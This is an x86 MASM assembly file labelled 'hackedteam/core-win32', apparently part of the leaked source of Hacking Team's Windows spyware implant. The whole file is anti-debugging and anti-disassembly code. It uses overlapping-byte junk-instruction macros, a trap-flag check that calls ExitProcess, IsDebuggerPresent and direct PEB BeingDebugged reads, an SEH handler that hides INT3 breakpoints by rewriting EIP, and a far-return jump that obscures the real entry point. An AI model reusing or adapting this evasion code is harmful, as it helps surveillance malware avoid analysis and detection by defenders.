hackedteam/core-win32

.586p
.MODEL FLAT, stdcall
option casemap :none   ; case sensitive
include c:\masm32\include\windows.inc
include c:\masm32\include\user32.inc
include c:\masm32\include\kernel32.inc
include c:\masm32\include\psapi.inc
.STACK
.DATA

.CODE

ASSUME fs:NOTHING

INCEAX MACRO
    db    0ebh, 0ffh, 0c0h
ENDM

PUSHEBP    MACRO
    db    0ebh, 0ffh, 0f5h
ENDM

TEST_TF MACRO param1
LOCAL dummy
    push        param1
    pushfd
    push        ss
    pop            ss
    pop            param1
    bt            param1, 8
    jnc            dummy
    mov            param1, ExitProcess
    push        param1
    push        dword ptr fs:[0]
    mov            dword ptr fs:[0], esp
    xor            param1, param1
    jmp            param1
dummy:
    pop            param1
ENDM

dll_status        dd    0

HIDING PROC
    PUSHEBP
    mov        ebp, esp
    nop
    nop
    jmp        @@1

@@1:
    pushf
    jmp        @@000
@@000:
    popf
    sub        esp, 10h
    ;int        03
    call    IsDebuggerPresent
    ;xor eax, eax
    push    eax
    fsetpm    ; garbage jmp
    TEST_TF    eax
    ;xor        eax, eax
    jmp        @@002
@@restore001:
    pop        dword ptr fs:[0]
    add        esp, 4
    jmp        @@3
@@002:
    push    offset INT03_Handler
    push    dword ptr fs:[0]
    mov        dword ptr fs:[0], esp
    
    ;mov        eax, offset InternalIsDebuggerPresent
    ;mov        dword ptr [eax], eax
    call    InternalIsDebuggerPresent
    jmp        @@restore001
@@3:
    ;xor        eax, eax
    push    eax
    xor        eax, eax
    INCEAX
    
    test    dword ptr [esp], eax
    jnz        @@2
    jz      @@2
    pop        eax
    push    1
    pop        eax
    test    dword ptr [esp], eax
    jnz        @@2
    ;pop        eax
@@DEBUG_SECTION:
    mov        eax, offset RealEntryPoint
    call    masquerade
masquerade:
    push    cs
    push    eax
    retf
@@2:
    xor            eax, eax
    mov            esp, ebp
    pop            ebp
    ret
    
RealEntryPoint    PROC
    call    @1
@1:
    pop        eax
    add        eax, 6
    ret
RealEntryPoint    ENDP
    nop
    jmp        Continue
    
Continue:
    ret
HIDING ENDP

INT03_Handler    PROC
    push        ebp
    mov            ebp, esp
    push        esi
    
    mov            esi, dword ptr [ebp+10h]
    xor            eax, eax
    mov            dword ptr [esi+04h], eax
    mov            dword ptr [esi+08h], eax
    mov            dword ptr [esi+0ch], eax
    mov            dword ptr [esi+10h], eax
    mov            dword ptr [esi+14h], eax
    mov            dword ptr [esi+18h], 155h

    mov            eax, dword ptr [esi+0b0h]    ; EAX
    call        eax     ; Invoke function
    mov            dword ptr [esi+0b0h], eax    ; Replace exit value
    mov            eax, dword ptr [esi+0b8h]
    cmp            byte ptr [eax], 0cch        ; CC ?
    jnz            @@001
    inc            dword ptr [esi+0b8h]        ; EIP = EIP +1
    jmp            @@100
@@001:
    cmp            word ptr [eax], 03cdh        ; EIP = EIP +1
    jnz            @@002
    inc            dword ptr [esi+0b8h]
    jmp            @@100
@@002:
    add            dword ptr [esi+0b8h], 2
    jmp            @@100
    mov            eax, offset ExitProcess
    mov            dword ptr [esi+0b8h], eax

@@100:    
    pop            esi
    mov            esp, ebp
    pop            ebp
    xor            eax, eax
    ret
INT03_Handler    ENDP

InternalIsDebuggerPresent PROC
    mov         eax, dword ptr fs:[18h]
    mov         eax, dword ptr [eax+30h]
    movzx         eax, byte ptr [eax+02h]
    ret
InternalIsDebuggerPresent ENDP

END